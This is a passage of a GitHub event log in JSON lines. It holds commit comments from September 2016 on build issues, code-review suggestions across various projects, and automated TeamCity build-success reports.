/lib64/libelf.so.1 (0x00007f662a161000)\r\n        libbz2.so.1 => /lib64/libbz2.so.1 (0x00007f6629f50000)\r\n[kimurhid@nvdb-pa4 lib]$ ls libdaxctl.*\r\nlibdaxctl.la  libdaxctl.so  libdaxctl.so.1  libdaxctl.so.1.0.0\r\n[kimurhid@nvdb-pa4 lib]$ ls libdaxctl.* -al\r\n-rwxr-xr-x. 1 root root   914 Sep 19 14:19 libdaxctl.la\r\nlrwxrwxrwx. 1 root root    18 Sep 19 14:19 libdaxctl.so -> libdaxctl.so.1.0.0\r\nlrwxrwxrwx. 1 root root    18 Sep 19 14:19 libdaxctl.so.1 -> libdaxctl.so.1.0.0\r\n-rwxr-xr-x. 1 root root 47734 Sep 19 14:19 libdaxctl.so.1.0.0\r\n[kimurhid@nvdb-pa4 lib]$ cd\r\n```\r\n\r\nOnce I compile with the command line recommended by autogen, it succeeded.\r\nMy wild guess is probably /usr/lib vs /usr/lib64 confusion somewhere in the build procedure."}},"created_at":"2016-09-19T21:37:34Z"}
{"id":"4586102530","type":"CommitCommentEvent","actor":{"login":"Piorjade"},"repo":{"name":"Piorjade/cLinux"},"payload":{"comment":{"id":19086203,"position":null,"line":null,"path":null,"commit_id":"f29ccacbdcecdb635b952bb0780602bdf783e331","created_at":"2016-09-19T21:37:58Z","updated_at":"2016-09-19T21:37:58Z","body":"Thx 4 the installer, now I don't need to use MSI-Maker all the time :)\r\n(Going to post gitget-cLinux on pastebin)"}},"created_at":"2016-09-19T21:37:58Z"}
{"id":"4586103445","type":"CommitCommentEvent","actor":{"login":"mathebox"},"repo":{"name":"Strassengezwitscher/Strassengezwitscher"},"payload":{"comment":{"id":19086206,"position":34,"line":2,"path":"frontend/app/events/eventDetail.component.html","commit_id":"87217b16ca1cd6dc25b50556b1d673f81817bcbc","created_at":"2016-09-19T21:38:10Z","updated_at":"2016-09-19T21:38:10Z","body":"Ohne die UI mal gesehen zu haben würde ich sagen: Lass mal den Inhalt nicht in ein `md-card`-Element packen. Das kann später schnell zu Problemen mit dem Twitter-Feed führen.\r\nIch kann aber später auch nochmal über das Design drübergucken."}},"created_at":"2016-09-19T21:38:10Z"}
{"id":"4586103773","type":"CommitCommentEvent","actor":{"login":"zenspider"},"repo":{"name":"ruby/ruby"},"payload":{"comment":{"id":19086207,"position":null,"line":null,"path":null,"commit_id":"c9dd5918f40dc6df3a237f634b9689bfbb591662","created_at":"2016-09-19T21:38:11Z","updated_at":"2016-09-19T21:38:11Z","body":"I'm due for a release soon. I can try to get on that today."}},"created_at":"2016-09-19T21:38:11Z"}
{"id":"4586104179","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/libpalaso"},"payload":{"comment":{"id":19086210,"position":null,"line":null,"path":null,"commit_id":"1295b14e95bbfac6c547c8200a48034f72b39e32","created_at":"2016-09-19T21:38:17Z","updated_at":"2016-09-19T21:38:17Z","body":"TeamCity libpalaso :: palaso-win32-master Continuous [Build 3.0.774.1295b14e95bbfac6c547c8200a48034f72b39e32](http://build.palaso.org/viewLog.html?buildId=76929&buildTypeId=bt223) outcome was **SUCCESS**\nSummary: Tests passed: 3490, ignored: 126 Build time: 00:04:06"}},"created_at":"2016-09-19T21:38:17Z"}
{"id":"4586105229","type":"CommitCommentEvent","actor":{"login":"dean0x7d"},"repo":{"name":"dean0x7d/pybind11"},"payload":{"comment":{"id":19086218,"position":89,"line":176,"path":"include/pybind11/pytypes.h","commit_id":"088db874a9bdb2f415b2aab2bba6edcf167c1cbe","created_at":"2016-09-19T21:38:31Z","updated_at":"2016-09-19T21:38:31Z","body":"Do you mean like this?\r\n```c++\r\nobj.attr(\"a\") = 1;\r\nauto b = obj.attr(\"a\");\r\nobj.attr(\"a\") = 2;\r\nb.cast<object>(); // expected 1, got 2\r\n```\r\nThat's a weakness of the lazy evaluation, but that's present even without the cache."}},"created_at":"2016-09-19T21:38:31Z"}
{"id":"4586107512","type":"CommitCommentEvent","actor":{"login":"ximex"},"repo":{"name":"Admidio/admidio"},"payload":{"comment":{"id":19086222,"position":null,"line":null,"path":null,"commit_id":"f5ef0e5057e10fb312ce83ddf0264b31bde12e0f","created_at":"2016-09-19T21:39:01Z","updated_at":"2016-09-19T21:39:01Z","body":"@Fasse why? this makes no sence to me why we need this?"}},"created_at":"2016-09-19T21:39:01Z"}
{"id":"4586109115","type":"CommitCommentEvent","actor":{"login":"LDVSOFT"},"repo":{"name":"LDVSOFT/spbau-term5-sql"},"payload":{"comment":{"id":19086224,"position":15,"line":15,"path":"script.sql","commit_id":"bd5955552ce7da333472d70826383a8eab1bc2a9","created_at":"2016-09-19T21:39:19Z","updated_at":"2016-09-19T21:39:19Z","body":"NULL как-то странно проверки проходит... Надо будет проверить."}},"created_at":"2016-09-19T21:39:19Z"}
{"id":"4586111386","type":"CommitCommentEvent","actor":{"login":"akutz"},"repo":{"name":"Masterminds/glide"},"payload":{"comment":{"id":19086232,"position":54,"line":337,"path":"repo/installer.go","commit_id":"9f8eca0c2806a5a5fed5c47a897932805040b815","created_at":"2016-09-19T21:39:45Z","updated_at":"2016-09-19T21:39:45Z","body":"I'm running into an issue when the vendor dir is mounted as a volume inside of a Docker container. I'll repeat here what I said in the Gitter chat:\r\n\r\n> Hmm, well, this is a blocking issue for us. I mean, Glide doesn't own the vendor directory. Glide just places content inside of it. Glide really has no right to nuke the entire directory IMO. And even then I wonder if that was because os.RemoveAll is easier than globbing the children of the directory and invoking the same function on each of them. Because at least that would be safer than nuking the vendor directory when it's mounted as a volume inside of Docker."}},"created_at":"2016-09-19T21:39:45Z"}
{"id":"4586113052","type":"CommitCommentEvent","actor":{"login":"aganita"},"repo":{"name":"johanna08/pasturetopantry"},"payload":{"comment":{"id":19086235,"position":2,"line":2,"path":"browser/js/cart/cart.js","commit_id":"deaee48e5825249168239d10bd6a05abfcf49aff","created_at":"2016-09-19T21:40:05Z","updated_at":"2016-09-19T21:40:05Z","body":"would rename the file to cart.controller.js\r\nand have another file called cart.state.js"}},"created_at":"2016-09-19T21:40:05Z"}
{"id":"4586113353","type":"CommitCommentEvent","actor":{"login":"Breekachux3"},"repo":{"name":"Breekachux3/codetopia"},"payload":{"comment":{"id":19086238,"position":null,"line":null,"path":null,"commit_id":"be4d8a9962b8ecaff5036caa5aa45448162ebe55","created_at":"2016-09-19T21:40:09Z","updated_at":"2016-09-19T21:40:09Z","body":"leave a comment.. :p"}},"created_at":"2016-09-19T21:40:09Z"}
{"id":"4586117387","type":"CommitCommentEvent","actor":{"login":"Breekachux3"},"repo":{"name":"booombaaeeng/codetopia"},"payload":{"comment":{"id":19086248,"position":null,"line":null,"path":null,"commit_id":"fb91b557d26ca8e7f52f77fd6f71dc719ce50a20","created_at":"2016-09-19T21:40:53Z","updated_at":"2016-09-19T21:40:53Z","body":"aha aha ? =D"}},"created_at":"2016-09-19T21:40:53Z"}
{"id":"4586118156","type":"CommitCommentEvent","actor":{"login":"prohweder"},"repo":{"name":"ianbergman/ORF"},"payload":{"comment":{"id":19086249,"position":null,"line":null,"path":null,"commit_id":"5548469a4cd473198c385900dfed426ae7a902d6","created_at":"2016-09-19T21:41:03Z","updated_at":"2016-09-19T21:41:03Z","body":"sweet"}},"created_at":"2016-09-19T21:41:03Z"}
{"id":"4586118854","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/libpalaso"},"payload":{"comment":{"id":19086250,"position":null,"line":null,"path":null,"commit_id":"1295b14e95bbfac6c547c8200a48034f72b39e32","created_at":"2016-09-19T21:41:10Z","updated_at":"2016-09-19T21:41:10Z","body":"TeamCity libpalaso :: palaso-precise64-master Continuous [Build 3.0.768.1295b14e95bbfac6c547c8200a48034f72b39e32](http://build.palaso.org/viewLog.html?buildId=76930&buildTypeId=bt322) outcome was **SUCCESS**\nSummary: Tests passed: 3470, ignored: 107 Build time: 00:06:56"}},"created_at":"2016-09-19T21:41:10Z"}
{"id":"4586120798","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"gosta705/repo1"},"payload":{"comment":{"id":19086254,"position":45,"line":45,"path":"src/ru/sberbank/school/Homework3/src/Text.java","commit_id":"3ce1fe7e88ffce04c5da9733e0f346ffd8ab8527","created_at":"2016-09-19T21:41:33Z","updated_at":"2016-09-19T21:41:33Z","body":"Компаратор написан очень сложно. Лишние сравнения + String наследуют Comparable => можно использовать s1.compareTo(s2);"}},"created_at":"2016-09-19T21:41:33Z"}
{"id":"4586120925","type":"CommitCommentEvent","actor":{"login":"Breekachux3"},"repo":{"name":"booombaaeeng/codetopia"},"payload":{"comment":{"id":19086255,"position":2,"line":1,"path":"ampel/index.html","commit_id":"fb91b557d26ca8e7f52f77fd6f71dc719ce50a20","created_at":"2016-09-19T21:41:35Z","updated_at":"2016-09-19T21:41:35Z","body":"komm nicht klar xD\r\n"}},"created_at":"2016-09-19T21:41:35Z"}
{"id":"4586122060","type":"CommitCommentEvent","actor":{"login":"aldanor"},"repo":{"name":"dean0x7d/pybind11"},"payload":{"comment":{"id":19086257,"position":89,"line":176,"path":"include/pybind11/pytypes.h","commit_id":"088db874a9bdb2f415b2aab2bba6edcf167c1cbe","created_at":"2016-09-19T21:41:48Z","updated_at":"2016-09-19T21:41:48Z","body":"Ah, yea, I guess.\r\n\r\nSo `accessor` now basically becomes an `optional<object>` of sorts where the wrapped object is retrieved lazily."}},"created_at":"2016-09-19T21:41:48Z"}
{"id":"4586123319","type":"CommitCommentEvent","actor":{"login":"montogeek"},"repo":{"name":"MoOx/phenomic"},"payload":{"comment":{"id":19086260,"position":null,"line":null,"path":null,"commit_id":"a6da7be9fed54bdd55284c46f70cfbe521b42e3f","created_at":"2016-09-19T21:42:01Z","updated_at":"2016-09-19T21:42:01Z","body":"But I wanted to be here!"}},"created_at":"2016-09-19T21:42:01Z"}
{"id":"4586124674","type":"CommitCommentEvent","actor":{"login":"booombaaeeng"},"repo":{"name":"booombaaeeng/codetopia"},"payload":{"comment":{"id":19086261,"position":2,"line":1,"path":"ampel/index.html","commit_id":"fb91b557d26ca8e7f52f77fd6f71dc719ce50a20","created_at":"2016-09-19T21:42:18Z","updated_at":"2016-09-19T21:42:18Z","body":"ich langsam\r\n"}},"created_at":"2016-09-19T21:42:18Z"}
{"id":"4586125752","type":"CommitCommentEvent","actor":{"login":"ivlis"},"repo":{"name":"ivlis/docker-alpine-postgres"},"payload":{"comment":{"id":19086264,"position":null,"line":null,"path":null,"commit_id":"e65b2e6eae16a547bcd2a0018234b91708399e35","created_at":"2016-09-19T21:42:31Z","updated_at":"2016-09-19T21:42:31Z","body":"Fixed in ab6cccedc06eec7c056294a7b8d64f08570ab3de"}},"created_at":"2016-09-19T21:42:31Z"}
{"id":"4586126886","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"gosta705/repo1"},"payload":{"comment":{"id":19086269,"position":55,"line":55,"path":"src/ru/sberbank/school/Homework3/src/Text.java","commit_id":"3ce1fe7e88ffce04c5da9733e0f346ffd8ab8527","created_at":"2016-09-19T21:42:43Z","updated_at":"2016-09-19T21:42:43Z","body":"Здесь реализовано несколько некрасиво потому, что в двух местах вызывается метод put"}},"created_at":"2016-09-19T21:42:43Z"}
{"id":"4586130105","type":"CommitCommentEvent","actor":{"login":"Huevos"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":19086275,"position":null,"line":null,"path":null,"commit_id":"65fb9480ece9d5761873f70a302bf068d1011f3d","created_at":"2016-09-19T21:43:24Z","updated_at":"2016-09-19T21:43:24Z","body":"Reverted because the source commit caused the ViX Day HD to hang from the top of the screen.\r\n\r\n![grab](https://cloud.githubusercontent.com/assets/2067864/18649972/d7e28898-7ec2-11e6-9696-53c541d05792.jpg)\r\n"}},"created_at":"2016-09-19T21:43:24Z"}
{"id":"4586131467","type":"CommitCommentEvent","actor":{"login":"Breekachux3"},"repo":{"name":"booombaaeeng/codetopia"},"payload":{"comment":{"id":19086279,"position":2,"line":1,"path":"ampel/index.html","commit_id":"fb91b557d26ca8e7f52f77fd6f71dc719ce50a20","created_at":"2016-09-19T21:43:40Z","updated_at":"2016-09-19T21:43:40Z","body":"xD ok ich kann kommentieren !! ein kleiner schritt für dich menschheit. Ein riesengroßer für mich"}},"created_at":"2016-09-19T21:43:40Z"}
{"id":"4586134151","type":"CommitCommentEvent","actor":{"login":"aganita"},"repo":{"name":"johanna08/pasturetopantry"},"payload":{"comment":{"id":19086282,"position":59,"line":59,"path":"browser/js/cart/cart.js","commit_id":"deaee48e5825249168239d10bd6a05abfcf49aff","created_at":"2016-09-19T21:44:13Z","updated_at":"2016-09-19T21:44:13Z","body":"create a sessionstorage.factory that handles most of the logic "}},"created_at":"2016-09-19T21:44:13Z"}
{"id":"4586134582","type":"CommitCommentEvent","actor":{"login":"booombaaeeng"},"repo":{"name":"booombaaeeng/codetopia"},"payload":{"comment":{"id":19086285,"position":2,"line":1,"path":"ampel/index.html","commit_id":"fb91b557d26ca8e7f52f77fd6f71dc719ce50a20","created_at":"2016-09-19T21:44:18Z","updated_at":"2016-09-19T21:44:18Z","body":"ok\r\n"}},"created_at":"2016-09-19T21:44:18Z"}
{"id":"4586135805","type":"CommitCommentEvent","actor":{"login":"kamcio96"},"repo":{"name":"GlowstoneMC/Glowstone"},"payload":{"comment":{"id":19086287,"position":null,"line":null,"path":null,"commit_id":"b1b26234680816f66cc28ed0cd85771264be0a4d","created_at":"2016-09-19T21:44:34Z","updated_at":"2016-09-19T21:44:34Z","body":"```thenAccept``` waits for result?"}},"created_at":"2016-09-19T21:44:34Z"}
{"id":"4586136340","type":"CommitCommentEvent","actor":{"login":"booombaaeeng"},"repo":{"name":"booombaaeeng/codetopia"},"payload":{"comment":{"id":19086291,"position":null,"line":null,"path":null,"commit_id":"fb91b557d26ca8e7f52f77fd6f71dc719ce50a20","created_at":"2016-09-19T21:44:40Z","updated_at":"2016-09-19T21:44:40Z","body":"kommt rein"}},"created_at":"2016-09-19T21:44:40Z"}
{"id":"4586136384","type":"CommitCommentEvent","actor":{"login":"aganita"},"repo":{"name":"johanna08/pasturetopantry"},"payload":{"comment":{"id":19086292,"position":14,"line":14,"path":"browser/js/cart/cartfactory.js","commit_id":"deaee48e5825249168239d10bd6a05abfcf49aff","created_at":"2016-09-19T21:44:41Z","updated_at":"2016-09-19T21:44:41Z","body":"should :)"}},"created_at":"2016-09-19T21:44:41Z"}
{"id":"4586142984","type":"CommitCommentEvent","actor":{"login":"aganita"},"repo":{"name":"johanna08/pasturetopantry"},"payload":{"comment":{"id":19086310,"position":21,"line":21,"path":"browser/js/checkout/checkout.js","commit_id":"deaee48e5825249168239d10bd6a05abfcf49aff","created_at":"2016-09-19T21:46:04Z","updated_at":"2016-09-19T21:46:04Z","body":"move to sessionstorage.factory.js ?"}},"created_at":"2016-09-19T21:46:04Z"}
{"id":"4586143811","type":"CommitCommentEvent","actor":{"login":"sporkmonger"},"repo":{"name":"go-ldap/ldap"},"payload":{"comment":{"id":19086313,"position":196,"line":196,"path":"example_test.go","commit_id":"e6cf29f660d821b39fbac571716c4dbcc1664a7a","created_at":"2016-09-19T21:46:14Z","updated_at":"2016-09-19T21:46:14Z","body":"Yeah, that was what I was thinking."}},"created_at":"2016-09-19T21:46:14Z"}
{"id":"4586144258","type":"CommitCommentEvent","actor":{"login":"icomrade"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":19086316,"position":null,"line":null,"path":null,"commit_id":"fe9b8fdcb4b5cf069e0cc287b97785a3448817c8","created_at":"2016-09-19T21:46:19Z","updated_at":"2016-09-19T21:46:19Z","body":"I agree that adding code to the server_monitor is bad, but I don't think it's that much of an impact since it's only doors and plot poles. I was between the two methods and ultimately chose to put the code in the server_monitor file since the code can be removed after the first startup, it results in a completely updated DB as opposed to a fragmented one, and does not require additional PV and SV.\r\n\r\nWe can just build and array of the plots and doors without evaluation then iterate through them in a loop outside of the foreach with the eval inside, and even save to profilenamespace to prevent the update loop from running after the first load up."}},"created_at":"2016-09-19T21:46:19Z"}
{"id":"4586144367","type":"CommitCommentEvent","actor":{"login":"britto"},"repo":{"name":"plataformatec/engine-credo"},"payload":{"comment":{"id":19086317,"position":null,"line":null,"path":null,"commit_id":"02a688b3caa053db32d08727e589a824e85bc2b5","created_at":"2016-09-19T21:46:21Z","updated_at":"2016-09-19T21:46:21Z","body":"❤️"}},"created_at":"2016-09-19T21:46:21Z"}
{"id":"4586149166","type":"CommitCommentEvent","actor":{"login":"Simn"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":19086326,"position":null,"line":null,"path":null,"commit_id":"f17b09242a3ce83488f29332996766802dbb11d7","created_at":"2016-09-19T21:47:16Z","updated_at":"2016-09-19T21:47:16Z","body":"Uhm, that's still on Test actually..."}},"created_at":"2016-09-19T21:47:16Z"}
{"id":"4586151066","type":"CommitCommentEvent","actor":{"login":"riccardi"},"repo":{"name":"kenzable/codeFriends"},"payload":{"comment":{"id":19086331,"position":77,"line":77,"path":"browser/js/cart/cart.js","commit_id":"d8581c1b1da808c23aba117f30d5ffc864952592","created_at":"2016-09-19T21:47:39Z","updated_at":"2016-09-19T21:47:39Z","body":"We are calling updateCartScope(); a lot here - I have a feeling this can be solved with a $watch function"}},"created_at":"2016-09-19T21:47:39Z"}
{"id":"4586153491","type":"CommitCommentEvent","actor":{"login":"pa-1gupta"},"repo":{"name":"pa-1gupta/web_sms"},"payload":{"comment":{"id":19086333,"position":null,"line":null,"path":null,"commit_id":"632343f91f1a29e737ecbcb9d4b06d438b637d4f","created_at":"2016-09-19T21:48:10Z","updated_at":"2016-09-19T21:48:10Z","body":"Implementation of files"}},"created_at":"2016-09-19T21:48:10Z"}
{"id":"4586158621","type":"CommitCommentEvent","actor":{"login":"nguyenhoan"},"repo":{"name":"boalang/compiler"},"payload":{"comment":{"id":19086346,"position":null,"line":null,"path":null,"commit_id":"fb76f51e76fe462daa1cfc53a2832cc15fa405fe","created_at":"2016-09-19T21:49:13Z","updated_at":"2016-09-19T21:49:13Z","body":"Is it safe to use non-blocking priority queue for maintaining the list of tokens across multiple threads?\r\nThere is class of BlockingPriorityQueue.\r\n\r\nIs there code for updating the queue with new reset time of a token?"}},"created_at":"2016-09-19T21:49:13Z"}
{"id":"4586158828","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":19086347,"position":null,"line":null,"path":null,"commit_id":"dbecd011dd207367bd97f6565fbee398877a1802","created_at":"2016-09-19T21:49:15Z","updated_at":"2016-09-19T21:49:15Z","body":"My aim is to devoid endgame PSQT values from any \"assumption\" about the presence of pawns, in the attempt to add orthogonality (and while we are at it, to make tuning PSQTs more feasible...)"}},"created_at":"2016-09-19T21:49:15Z"}
{"id":"4586158939","type":"CommitCommentEvent","actor":{"login":"pa-1gupta"},"repo":{"name":"pa-1gupta/web_sms"},"payload":{"comment":{"id":19086348,"position":14,"line":12,"path":"README.md","commit_id":"632343f91f1a29e737ecbcb9d4b06d438b637d4f","created_at":"2016-09-19T21:49:16Z","updated_at":"2016-09-19T21:49:16Z","body":"\r\n[get_detail.txt](https://github.com/pa-1gupta/web_sms/files/481185/get_detail.txt)\r\n\r\n[indexpage.txt](https://github.com/pa-1gupta/web_sms/files/481188/indexpage.txt)\r\n\r\n[tablepage.txt](https://github.com/pa-1gupta/web_sms/files/481189/tablepage.txt)\r\n\r\n\r\n\r\n"}},"created_at":"2016-09-19T21:49:16Z"}
{"id":"4586159008","type":"CommitCommentEvent","actor":{"login":"riccardi"},"repo":{"name":"kenzable/codeFriends"},"payload":{"comment":{"id":19086349,"position":4,"line":4,"path":"browser/js/common/factories/CheckoutFactory.js","commit_id":"d8581c1b1da808c23aba117f30d5ffc864952592","created_at":"2016-09-19T21:49:18Z","updated_at":"2016-09-19T21:49:18Z","body":"Do we need this?"}},"created_at":"2016-09-19T21:49:18Z"}
{"id":"4586159280","type":"CommitCommentEvent","actor":{"login":"CaliCastle"},"repo":{"name":"CaliProject/createdu"},"payload":{"comment":{"id":19086352,"position":15,"line":20,"path":"app/Models/Category.php","commit_id":"0029d5c32c6127a262d477e7cdd6450f7e413574","created_at":"2016-09-19T21:49:21Z","updated_at":"2016-09-19T21:49:21Z","body":"...为啥"}},"created_at":"2016-09-19T21:49:21Z"}
{"id":"4586161441","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"gosta705/repo1"},"payload":{"comment":{"id":19086354,"position":60,"line":60,"path":"src/ru/sberbank/school/Homework3/src/Text.java","commit_id":"3ce1fe7e88ffce04c5da9733e0f346ffd8ab8527","created_at":"2016-09-19T21:49:47Z","updated_at":"2016-09-19T21:49:47Z","body":"Необходимо вывести число различных слов, используемых в файле. В такой реализации не будет учитано требование различности."}},"created_at":"2016-09-19T21:49:47Z"}
{"id":"4586164359","type":"CommitCommentEvent","actor":{"login":"riccardi"},"repo":{"name":"kenzable/codeFriends"},"payload":{"comment":{"id":19086360,"position":12,"line":12,"path":"browser/js/product/product-review.html","commit_id":"d8581c1b1da808c23aba117f30d5ffc864952592","created_at":"2016-09-19T21:50:24Z","updated_at":"2016-09-19T21:50:24Z","body":"These two files can probably be directives ^^"}},"created_at":"2016-09-19T21:50:24Z"}
{"id":"4586165303","type":"CommitCommentEvent","actor":{"login":"nadako"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":19086361,"position":null,"line":null,"path":null,"commit_id":"f17b09242a3ce83488f29332996766802dbb11d7","created_at":"2016-09-19T21:50:35Z","updated_at":"2016-09-19T21:50:35Z","body":"oh, fml\r\n"}},"created_at":"2016-09-19T21:50:35Z"}
{"id":"4586168626","type":"CommitCommentEvent","actor":{"login":"riccardi"},"repo":{"name":"kenzable/codeFriends"},"payload":{"comment":{"id":19086372,"position":81,"line":81,"path":"browser/js/product/product.js","commit_id":"d8581c1b1da808c23aba117f30d5ffc864952592","created_at":"2016-09-19T21:51:16Z","updated_at":"2016-09-19T21:51:16Z","body":"There is a lot of logic in this controller that can probably just be placed in the factory"}},"created_at":"2016-09-19T21:51:16Z"}
{"id":"4586168788","type":"CommitCommentEvent","actor":{"login":"dean0x7d"},"repo":{"name":"dean0x7d/pybind11"},"payload":{"comment":{"id":19086374,"position":89,"line":176,"path":"include/pybind11/pytypes.h","commit_id":"088db874a9bdb2f415b2aab2bba6edcf167c1cbe","created_at":"2016-09-19T21:51:18Z","updated_at":"2016-09-19T21:51:18Z","body":"`accessor` has essentially always been that. This just adds a cache so that things likes this don't end up fetching the object several times:\r\n```c++\r\nauto method = obj.attr(\"method\");\r\nmethod(1);\r\nmethod(2);\r\nmethod(3);\r\n```\r\nWithout the cache, each method call would call `getattr`."}},"created_at":"2016-09-19T21:51:18Z"}
{"id":"4586173244","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19086396,"position":null,"line":null,"path":null,"commit_id":"adfe08d556a5a9300b4dab4c35f5fc3456e3343f","created_at":"2016-09-19T21:52:15Z","updated_at":"2016-09-19T21:52:15Z","body":"Also see [Pull Request 287: Cleanup VS2010 Project Files by inheriting Optimizations and PreprocessorDefinitions](http://github.com/weidai11/cryptopp/issues/287)"}},"created_at":"2016-09-19T21:52:15Z"}
{"id":"4586173831","type":"CommitCommentEvent","actor":{"login":"Brownlow"},"repo":{"name":"seejake/jb-icon"},"payload":{"comment":{"id":19086399,"position":null,"line":null,"path":null,"commit_id":"5545868d8785106c252129604e2f05a093b29a91","created_at":"2016-09-19T21:52:22Z","updated_at":"2016-09-19T21:52:22Z","body":"Nice! "}},"created_at":"2016-09-19T21:52:22Z"}
{"id":"4586174010","type":"CommitCommentEvent","actor":{"login":"terminalmage"},"repo":{"name":"terminalmage/salt"},"payload":{"comment":{"id":19086400,"position":null,"line":null,"path":null,"commit_id":"1abbd1d39dcc194a4206cd6150799acad97f608e","created_at":"2016-09-19T21:52:24Z","updated_at":"2016-09-19T21:52:24Z","body":"That doesn't match the code. But your point is well made, I hadn't seen the actual output so that didn't occur to me. I was trying to reduce code duplication. I just pushed a commit to this branch which changes this logging and error message to remove the reference to the SLS file from the error but keep it in the log message."}},"created_at":"2016-09-19T21:52:24Z"}
{"id":"4586174464","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"johanna08/pasturetopantry"},"payload":{"comment":{"id":19086401,"position":8,"line":8,"path":"browser/js/products/products.html","commit_id":"deaee48e5825249168239d10bd6a05abfcf49aff","created_at":"2016-09-19T21:52:29Z","updated_at":"2016-09-19T21:52:29Z","body":"Add one more link under the ng-repeated links that does `$scope.reset()`."}},"created_at":"2016-09-19T21:52:29Z"}
{"id":"4586175537","type":"CommitCommentEvent","actor":{"login":"terminalmage"},"repo":{"name":"terminalmage/salt"},"payload":{"comment":{"id":19086404,"position":null,"line":null,"path":null,"commit_id":"1abbd1d39dcc194a4206cd6150799acad97f608e","created_at":"2016-09-19T21:52:44Z","updated_at":"2016-09-19T21:52:44Z","body":"I'm also working with @Utah_Dave right now to test this, as I don't have a Windows box handy."}},"created_at":"2016-09-19T21:52:44Z"}
{"id":"4586176480","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"johanna08/pasturetopantry"},"payload":{"comment":{"id":19086410,"position":5,"line":5,"path":"browser/js/products/products.js","commit_id":"deaee48e5825249168239d10bd6a05abfcf49aff","created_at":"2016-09-19T21:52:56Z","updated_at":"2016-09-19T21:52:56Z","body":"Add `var products`"}},"created_at":"2016-09-19T21:52:56Z"}
{"id":"4586178028","type":"CommitCommentEvent","actor":{"login":"roccobruno"},"repo":{"name":"roccobruno/spring-rest-service"},"payload":{"comment":{"id":19086418,"position":10,"line":18,"path":"src/main/java/com/bruno/exception/GestioneException.java","commit_id":"6f74bf1a18100f5174cd95c76629de4d883c89cb","created_at":"2016-09-19T21:53:15Z","updated_at":"2016-09-19T21:53:15Z","body":"non ti serve questo se tutti implementano questa interfaccia"}},"created_at":"2016-09-19T21:53:15Z"}
{"id":"4586178762","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"gosta705/repo1"},"payload":{"comment":{"id":19086419,"position":64,"line":64,"path":"src/ru/sberbank/school/Homework3/src/Text.java","commit_id":"3ce1fe7e88ffce04c5da9733e0f346ffd8ab8527","created_at":"2016-09-19T21:53:24Z","updated_at":"2016-09-19T21:53:24Z","body":"Для этого задания лучше было использовать отдельный TreeSet.\r\n+ без своего Comparator'а здесь не обойтись - сначала по длине сортировка должна осуществиться. Например, для слов \"1\", \"111\" и \"2\" должно быть 1 -> 2 -> 111, а не 1 -> 111 -> 2"}},"created_at":"2016-09-19T21:53:24Z"}
{"id":"4586178978","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"johanna08/pasturetopantry"},"payload":{"comment":{"id":19086421,"position":10,"line":10,"path":"browser/js/products/products.js","commit_id":"deaee48e5825249168239d10bd6a05abfcf49aff","created_at":"2016-09-19T21:53:27Z","updated_at":"2016-09-19T21:53:27Z","body":"Then do `$scope.reset = function () { $scope.products = products; }`"}},"created_at":"2016-09-19T21:53:27Z"}
{"id":"4586180498","type":"CommitCommentEvent","actor":{"login":"LarsAsplund"},"repo":{"name":"VHDL/CoreLib"},"payload":{"comment":{"id":19086429,"position":17,"line":17,"path":"data_structures/src/Dictionary.vhd","commit_id":"ddb0959bca5a340964df7455f8180757a1741601","created_at":"2016-09-19T21:53:44Z","updated_at":"2016-09-19T21:53:44Z","body":"The best thing is if the `Init` procedure can be avoided altogether such that all you have to do is to declare a variable of the protected type and it will work. Logging is something that could be enabled/disabled at anytime so there should be no `Init` to support that.\r\n\r\nAnyway, what type of logging did you have in mind? "}},"created_at":"2016-09-19T21:53:44Z"}
{"id":"4586182178","type":"CommitCommentEvent","actor":{"login":"dehann"},"repo":{"name":"wadehenning/KernelDensityEstimate.jl"},"payload":{"comment":{"id":19086435,"position":null,"line":null,"path":null,"commit_id":"a6e161640244de8e33b942bf57a58438f948dc33","created_at":"2016-09-19T21:54:06Z","updated_at":"2016-09-19T21:54:06Z","body":"@wadehenning would you be willing to share your modifications for PyPlot.jl or Plots.jl? Maybe we could make a separate package for plotting KDEs using user selected plotting library somehow... Also, you can avoid compiling and availability of code by simply commenting line in KernelDensityEstimate.jl file. The unlinked source file shouldn't cause any harm."}},"created_at":"2016-09-19T21:54:06Z"}
{"id":"4586183746","type":"CommitCommentEvent","actor":{"login":"Zhivko1985"},"repo":{"name":"Zhivko1985/hello-world"},"payload":{"comment":{"id":19086441,"position":null,"line":null,"path":null,"commit_id":"f8b8953a737f0bc1df32ad7690c7ca1860526762","created_at":"2016-09-19T21:54:25Z","updated_at":"2016-09-19T21:54:25Z","body":"?"}},"created_at":"2016-09-19T21:54:25Z"}
{"id":"4586185526","type":"CommitCommentEvent","actor":{"login":"Zhivko1985"},"repo":{"name":"Zhivko1985/hello-world"},"payload":{"comment":{"id":19086449,"position":3,"line":3,"path":"README.md","commit_id":"f8b8953a737f0bc1df32ad7690c7ca1860526762","created_at":"2016-09-19T21:54:48Z","updated_at":"2016-09-19T21:54:48Z","body":"??\r\n"}},"created_at":"2016-09-19T21:54:48Z"}
{"id":"4586185727","type":"CommitCommentEvent","actor":{"login":"aganita"},"repo":{"name":"johanna08/pasturetopantry"},"payload":{"comment":{"id":19086450,"position":1,"line":1,"path":"browser/js/products/products.js","commit_id":"deaee48e5825249168239d10bd6a05abfcf49aff","created_at":"2016-09-19T21:54:50Z","updated_at":"2016-09-19T21:54:50Z","body":"create product.controller.js"}},"created_at":"2016-09-19T21:54:50Z"}
